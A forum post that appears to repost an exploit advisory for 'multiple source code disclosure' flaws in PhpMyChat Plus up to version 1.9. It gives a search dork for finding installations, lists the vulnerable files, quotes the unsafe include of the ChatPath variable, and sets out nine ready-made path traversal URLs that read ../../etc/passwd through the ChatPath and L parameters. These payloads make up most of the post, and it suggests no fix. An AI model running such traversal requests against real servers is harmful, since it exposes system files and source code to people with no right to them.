Jump to content
escalation666

PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure

Recommended Posts

Posted

a*******************************************************************************

# Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure

Vulnerabilities

# Author : ajann

# Dork : phpMyChat plus

# Vuln;

*******************************************************************************

[Files]

avatar.php

colorhelp_popup.php

color_popup.php

index.php

index1.php

/lib/connected_users.lib.php

/lib/index.lib.php

logs.php

phpMyChat.php3

[/Files]

[Code,1]

connected_users.lib.php Error:

..

....

require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");

require("./${ChatPath}/lib/clean.lib.php");

....

..

Key [:] ChatPath=[file]

Key [:] ChatPath=[file]

Key [:] ChatPath=[file]

Key [:] ChatPath=[file]

Key [:] ChatPath=[file]

Key [:] ChatPath=[file]

Key [:] ChatPath=[file]

Key [:] L=[file]

Key [:] ChatPath=[file]

Example:

http://target.com/path/avatar.php?ChatPath=../../etc/passwd

http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd

http://target.com/path/color_popup.php?ChatPath=../../etc/passwd

http://target.com/path/index.php?ChatPath=../../etc/passwd

http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd

http://target.com/path/avatar.php?ChatPath=../../etc/passwd

http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd

http://target.com/path/logs.php?L=../../etc/passwd

http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd

# ajann,Turkey

# ...

# Im not Hacker!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...